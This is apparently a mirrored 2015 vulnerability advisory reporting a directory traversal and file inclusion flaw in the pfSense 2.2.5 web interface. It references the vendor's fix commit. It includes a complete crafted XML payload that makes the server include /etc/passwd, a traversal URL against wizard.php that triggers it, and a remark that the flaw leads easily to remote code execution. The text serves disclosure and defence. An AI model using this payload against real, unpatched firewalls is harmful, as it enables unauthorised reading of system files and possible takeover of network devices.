扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 |
# Title : PFSense<= 2.2.5 Directory Traversal # Date : 18/12/2015 # Author : R-73eN # Tested on : PFSense 2.2.5 # Software : https://github.com/pfsense/pfsense # Vendor : https://pfsense.org/ #_________ __ # |_ _|_ __/ _| ___/ ___| ___ _ __/ \| | #| || '_ \| |_ / _ \| |_ / _ \ '_ \/ _ \ | | #| || | | |_| (_) | |_| |__/ | | |/ ___ \| |___ # |___|_| |_|_|\___/ \____|\___|_| |_| /_/ \_\_____| # # # Fix provided by the vendor https://github.com/pfsense/pfsense/commit/3ac0284805ce357552c3ccaeff0a9aadd0c6ea13 # # In pfsense <= 2.2.5 (Latest Version) , during a security audit i discovered the following vulnerabilities in the pfsense Webgui. The following files are vulnerable to a file inclusion attack wizard.php?xml= pkg.php?xml= Both of this files do not sanitize the path of the xml parameter and we can load xml files, and loading a special crafted xml file we can gain command execution. Example: 1.xml (the filename can be whatever .txt , .jpg etc because it does not check for the file extension) The content of the 1.xml should be: <?xml version="1.0" encoding="utf-8" ?> <pfsensewizard> <totalsteps>12</totalsteps> <step> <id>1</id> <title>LFI example </title> <description>Lfi example </description> <disableheader>on</disableheader> <stepsubmitphpaction>step1_submitphpaction();</stepsubmitphpaction> <includefile>/etc/passwd</includefile> </step> </pfsensewizard> the parameter <includefile> is passed to a require_once() function which triggers the File inclusion Attack. As we all know File inclusion attack can be converted toRCEvery easily. Then visiting http://vulnhost/wizard.php?xml=../../../1.xml where the "xml" parameter is the path of the crafted file, will trigger the vulnerability. Thanks Rio Sherri https://www.infogen.al/ - Infogen AL |
体验盒子
